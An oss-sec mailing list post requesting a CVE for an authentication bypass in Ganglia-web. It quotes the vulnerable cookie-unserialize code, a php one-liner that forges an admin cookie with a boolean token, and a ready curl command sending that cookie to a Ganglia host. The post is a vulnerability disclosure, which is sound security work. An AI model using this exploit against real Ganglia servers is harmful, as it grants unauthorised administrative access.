oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE request: Ganglia-web auth bypass

From: Ivan Novikov <in () wallarm com>
Date: Fri, 04 Sep 2015 20:34:39 +0300
Reported by GitHub:
https://github.com/ganglia/ganglia-web/issues/267

It's easy to bypass auth by using boolean serialization like this:
$ php -r "echo urlencode(serialize(array('user'=>'admin',
'group'=>'admin', 'token'=>true)));"

Vulnerable code listed below:
https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46

if(isSet($_COOKIE['ganglia_auth'])) {
  $cookie = $_COOKIE['ganglia_auth'];
  // magic quotes will break unserialization
  if($this->getMagicQuotesGpc()) {
    $cookie = stripslashes($cookie);
  }
  $data = unserialize($cookie);
  if(array_keys($data) != array('user','group','token')) {
    return false;
  }
  if($this->getAuthToken($data['user']) == $data['token']) {

// Found by d90.andrew
// Exploit: curl -H 'Cookie:
a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D'
http://ganglia.local/ganglia/
Previous By Date Next
Previous By Thread Next

Current thread: